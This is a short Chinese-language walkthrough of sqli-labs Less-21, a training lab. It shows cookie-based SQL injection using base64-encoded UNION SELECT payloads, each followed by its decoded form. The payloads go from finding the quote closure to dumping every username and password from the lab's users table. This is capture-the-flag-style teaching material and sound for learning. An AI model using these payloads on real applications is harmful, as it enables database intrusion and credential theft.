sqli-labs (less-21)
进入21关,输入用户名与密码,发现跟20关基本一样,这里我们猜想也是在cookie的位置进入注入
利用Cookies Manager +抓取到cookie信息后,发现竟然是一串字母,这里就很懵了,但我们仔细查看特征后,发现只是利用了base64加密
转码后发现就是admin,所以这里的思路就是先构造我们的SQL语句,然后再随便找一个base64网站转码就行了
#以下过程均是base64转码后的结果
先输入一个
Jw== #'单引号
屏幕回显错误,根据错误信息判断闭合方式为’),并且为字符型注入
查看当前库
JykgdW5pb24gc2VsZWN0IDEsMixkYXRhYmFzZSgpIw== #') union select 1,2,database()#
查看security库下的所有表
JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSdzZWN1cml0eScpIw== #') union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema='security')#
查看users表下的所有字段
JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdChjb2x1bW5fbmFtZSkgZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPSd1c2VycycpIw== #') union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='users')#
查看username,password字段的所有的值
JykgdW5pb24gc2VsZWN0IDEsMiwoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2Vycykj #') union select 1,2,(select group_concat(username,password) from security.users)#